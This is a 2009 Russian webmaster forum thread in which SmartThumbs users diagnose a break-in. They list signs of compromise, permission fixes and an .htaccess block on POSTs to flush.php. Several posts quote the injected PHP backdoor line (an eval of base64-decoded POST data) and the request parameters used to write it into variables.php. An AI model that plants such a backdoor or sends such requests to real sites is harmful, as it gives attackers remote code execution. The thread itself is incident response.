Реклама на сайте Advertise with us

SmartThumbs HACKED again

Расширенный поиск по форуму
 
Новая тема Новая тема   
Автор
Поиск в теме:



С нами с 22.05.03
Сообщения: 1405
Рейтинг: 843

Ссылка на сообщениеДобавлено: 08/10/09 в 12:42       Ответить с цитатойцитата 

WeRock писал:

Вобщем как я понимаю, меня тоже поломали? Вопрос, что делать? :-) Ну не удалять же все файлы с domaing#2.com....
Пока ничего не трогал. Могу что-ниубдь "затестить".
ЗЫ: Кстати, есть еще два независимых домена на этом же сервере с версиями СТ 5.70 и 5.66 - на них симптомов не обнаружено.


поскольку у тебя старые версии смарта - то и картинка отличается.

проверь .htpasswd, /admin/variables.php - удали эту строчку
из директории /tmp/ удали
install.php тоже можно удалить, т.к. он просто не нужен


classes/php_class.php - это дырка еще с прошлой версии.
можно обнулить этот файл и так же параметры для него сделать нулевыми, чтобы никто к нему доступа не смог получить и перезаписать не смог и выполнить, рут нужен обычно для этого

0
 



С нами с 24.10.06
Сообщения: 169
Рейтинг: 147

Ссылка на сообщениеДобавлено: 08/10/09 в 13:24       Ответить с цитатойцитата 

Цитата:
classes/php_class.php - это дырка еще с прошлой версии.

т.е. он у меня уже был сломан?!?! Где-то можно про это почитать? Не слышал и в новостях на сайте смарттумбса такого не видел...

Цитата:
можно обнулить этот файл и так же параметры для него сделать нулевыми, чтобы никто к нему доступа не смог получить и перезаписать не смог и выполнить, рут нужен обычно для этого

спасибо, так и сделал, обнулил и выставил нулевые права.

0
 



С нами с 30.03.08
Сообщения: 1212
Рейтинг: 606

Ссылка на сообщениеДобавлено: 08/10/09 в 13:35       Ответить с цитатойцитата 

Хреновая новость у меня все сайты на СТ

0
 



С нами с 01.02.07
Сообщения: 231
Рейтинг: 294

Ссылка на сообщениеДобавлено: 08/10/09 в 13:40       Ответить с цитатойцитата 

Нашел дырку


Вопрос, файлик /st/admin/variables.php должен иметь права 777 (или иным образом быть доступным для записи вебсервером, например принадлежать пользователю www) ?

0
 



С нами с 11.08.06
Сообщения: 939
Рейтинг: 849

Ссылка на сообщениеДобавлено: 08/10/09 в 13:46       Ответить с цитатойцитата 

WeRock писал:
Не слышал и в новостях на сайте смарттумбса такого не видел...
http://www.askdamagex.com/f2/attention-all-smart-thumbs-users-16660/

5
 



С нами с 01.02.07
Сообщения: 231
Рейтинг: 294

Ссылка на сообщениеДобавлено: 08/10/09 в 13:49       Ответить с цитатойцитата 

zuborg писал:
Вопрос, файлик /st/admin/variables.php должен иметь права 777 (или иным образом быть доступным для записи вебсервером, например принадлежать пользователю www) ?


Это был вопрос автору
Второй вопрос - в POST запросе
key=Dys%3D&action=niche&niche=1 откуда берется значение key ? Его можно высчитать, зная исходники ST ?

2
 



С нами с 22.05.03
Сообщения: 1405
Рейтинг: 843

Ссылка на сообщениеДобавлено: 08/10/09 в 14:18       Ответить с цитатойцитата 

zuborg писал:
Нашел дырку

Вопрос, файлик /st/admin/variables.php должен иметь права 777 (или иным образом быть доступным для записи вебсервером, например принадлежать пользователю www) ?


ты именно дырку нашел или запечатлел факт взлома?

насчет этого файлика - ну по уму, сам понимаешь, он не должен иметь права 777, но так его выставляет смарттамбс. в этот файл они пишут сеттингсы.

кто-то предложил выставить на него права 444, при этом он не будет писаться вообще, если я понимаю. а если необходимо поменять настройки - то снова менять права на файл. это большой гимор (для меня точно), с другой стороны для безопасности можно временно пойти и на это, пока не сделают фикс.

по поводу пост-запросов и кея - не знаю, тут нужно спрашивать авторов софта. они вроде начали отвечать в том топике на аскдамаге

0
 



С нами с 10.08.03
Сообщения: 556
Рейтинг: 127

Ссылка на сообщениеДобавлено: 08/10/09 в 14:19       Ответить с цитатойцитата 

Цитата:
упс не так понял

0
 



С нами с 01.02.07
Сообщения: 231
Рейтинг: 294

Ссылка на сообщениеДобавлено: 08/10/09 в 14:22       Ответить с цитатойцитата 

fihorn писал:
ты именно дырку нашел или запечатлел факт взлома?


нашел запрос которым в файлике variables.php прописывается строчка
$niche='1';@eval(base64_decode($_POST[qxp]));//';

2
 



С нами с 22.01.04
Сообщения: 1037
Рейтинг: 694

Ссылка на сообщениеДобавлено: 08/10/09 в 14:23       Ответить с цитатойцитата 

zuborg: это давно уже нашли.

0
 

worldtraffic.trade

С нами с 20.08.06
Сообщения: 2836
Рейтинг: 2309

Ссылка на сообщениеДобавлено: 08/10/09 в 14:27       Ответить с цитатойцитата 

fihorn писал:
я тоже удалил, т.к. его не должно быть
народ не чешется вообще, я погляжу..
в треп что ли запостить..

можешь обьяснить почему его нужно удалить и почему его не должно быть? а то я проверил он есть у всех копиях СТ дата создания совподает с таким файлом calendar.js или в этой папке вообще не должно быть .js файлов?

трейд Teen, Mature
Качественные ссылки

0
 



С нами с 22.05.03
Сообщения: 1405
Рейтинг: 843

Ссылка на сообщениеДобавлено: 08/10/09 в 14:30       Ответить с цитатойцитата 

world-gay-sex писал:
можешь обьяснить почему его нужно удалить и почему его не должно быть? а то я проверил он есть у всех копиях СТ дата создания совподает с таким файлом calendar.js или в этой папке вообще не должно быть .js файлов?


там должен быть
sniffer.js
но не должно быть
sniffer_class.php


а по поводу запроса, которым прописывается строчка - хотел сначала попросить сюда выложить, потом подумал, что не стоит.
как-то заблокировать его можно?

0
 



С нами с 01.02.07
Сообщения: 231
Рейтинг: 294

Ссылка на сообщениеДобавлено: 08/10/09 в 15:14       Ответить с цитатойцитата 

fihorn писал:
как-то заблокировать его можно?

Просто интересно, как взломщик подбирает key
достаточно ли тут имени домена или надо другая секретная информация

Я не знаток ST, непонятно зачем вообще открывать скрипт который меняет глобальные настройки в общий доступ, даже если он "защищен" этим параметром key.
Может запретить на /st/flush.php POST вообще, кроме некоторых ипов ?

2
 



С нами с 10.10.07
Сообщения: 339
Рейтинг: 404

Ссылка на сообщениеДобавлено: 08/10/09 в 15:20       Ответить с цитатойцитата 

нужен не только key, но и token для сверки операции с базой

http://soft-com.biz/ - Администрирование серверов, 24/7 тех.поддержка и мониторинг.

3
 



С нами с 01.02.07
Сообщения: 231
Рейтинг: 294

Ссылка на сообщениеДобавлено: 08/10/09 в 15:30       Ответить с цитатойцитата 

запрос работает без token вполне успешно, но key для разных доменов разные


вариантов пока вижу два, первы - убрать права разрешающие запись всем на файлик /st/admin/variables.php, обычно стоят права 777 и владелец www впридачу, надо поставить 444

второй - запретить POST-ы на /st/flush.php

я не спец по ST и не знаю чем чреваты оба варианта

3
 



С нами с 01.02.07
Сообщения: 231
Рейтинг: 294

Ссылка на сообщениеДобавлено: 08/10/09 в 15:35       Ответить с цитатойцитата 

признаки взлома:
а) не должно быть левых юзеров в st/admin/.htpasswd
б) не должно быть include и eval в st/admin/variables.php
в) не должно быть php файлов в st/thumbs

кто-то знает ещё четкие признаки ?

3
 

Гражданин планеты Земля

С нами с 30.03.03
Сообщения: 7217
Рейтинг: 2185

Ссылка на сообщениеДобавлено: 08/10/09 в 15:53       Ответить с цитатойцитата 

zuborg писал:
кто-то знает ещё четкие признаки ?

У меня в variables.php было так
Код:

<?
// здесь все нормально как и на других смартах
// которые не имеют никаких признаков взлома
$md5_check_password='';
$md5_check_url='';
$skim_url='';
$skim_percentage='0.00';
?>
<?$qall=1;?>

а вот на смарте, который имел пустого юзера и php файл в st/thumbs, появился какой-то добавочный параметр в конце <?$qall=1;?> icon_surprised.gif

Гыыы

1
 



С нами с 24.10.06
Сообщения: 169
Рейтинг: 147

Ссылка на сообщениеДобавлено: 08/10/09 в 15:54       Ответить с цитатойцитата 

г) в директоии /tmp/ сервера не должно быть файла ases.tmp

0
 



С нами с 10.10.07
Сообщения: 339
Рейтинг: 404

Ссылка на сообщениеДобавлено: 08/10/09 в 15:57       Ответить с цитатойцитата 

WeRock писал:

г) в директоии /tmp/ сервера не должно быть файла ases.tmp


*ses.tmp

http://soft-com.biz/ - Администрирование серверов, 24/7 тех.поддержка и мониторинг.

0
 



С нами с 01.02.07
Сообщения: 231
Рейтинг: 294

Ссылка на сообщениеДобавлено: 08/10/09 в 15:58       Ответить с цитатойцитата 

знатоки ST, что может поломать такой st/.htaccess ?

Код:
<Files flush.php>
  <Limit POST>
    Deny from all
  </Limit>
</Files>

2
 



С нами с 01.02.07
Сообщения: 231
Рейтинг: 294

Ссылка на сообщениеДобавлено: 08/10/09 в 16:31       Ответить с цитатойцитата 

Soft-Com писал:
/tmp/*ses.tmp

эти файлы заливаются через дырку когда в variables.php строчку
Код:
$niche='1';

меняют на
Код:
$niche='1';@eval(base64_decode($_POST[qxp]));//';

2
 

Гражданин планеты Земля

С нами с 30.03.03
Сообщения: 7217
Рейтинг: 2185

Ссылка на сообщениеДобавлено: 08/10/09 в 16:49       Ответить с цитатойцитата 

Проверьте плиз у вас встречается в вариаблес параметр <?$qall=1;?> ? Это смартовский параметр или все-таки левый.

Гыыы

0
 



С нами с 24.10.06
Сообщения: 169
Рейтинг: 147

Ссылка на сообщениеДобавлено: 08/10/09 в 17:23       Ответить с цитатойцитата 

Цитата:
Проверьте плиз у вас встречается в вариаблес параметр <?$qall=1;?> ?


у меня нет такого. Похоже на левак.

0
 

Клева

С нами с 07.02.04
Сообщения: 12781
Рейтинг: 3531

Ссылка на сообщениеДобавлено: 08/10/09 в 19:12       Ответить с цитатойцитата 

Нашел у себя эту хрень
еще все клики по тумбам открывают корень домена, админка смарта не показывает что по тумбам кликают, при это логов ошибок крона нет.
Это что за фигня? Вроде все подчистил

0
 

Клева

С нами с 07.02.04
Сообщения: 12781
Рейтинг: 3531

Ссылка на сообщениеДобавлено: 08/10/09 в 19:49       Ответить с цитатойцитата 

Кстати версия смарта была предпоследней, а не последней

0
 
Новая тема Новая тема   

Текстовая реклама в форме ответа
Заголовок и до четырех строчек текста
Длина текста до 350 символов
Купить рекламу в этом месте!


Перейти:  



Спонсор раздела Стань спонсором этого раздела!

Реклама на сайте Advertise with us

Опросы

Рецепт новогоднего блюда 2022



Обсудите на форуме обсудить (11)
все опросы »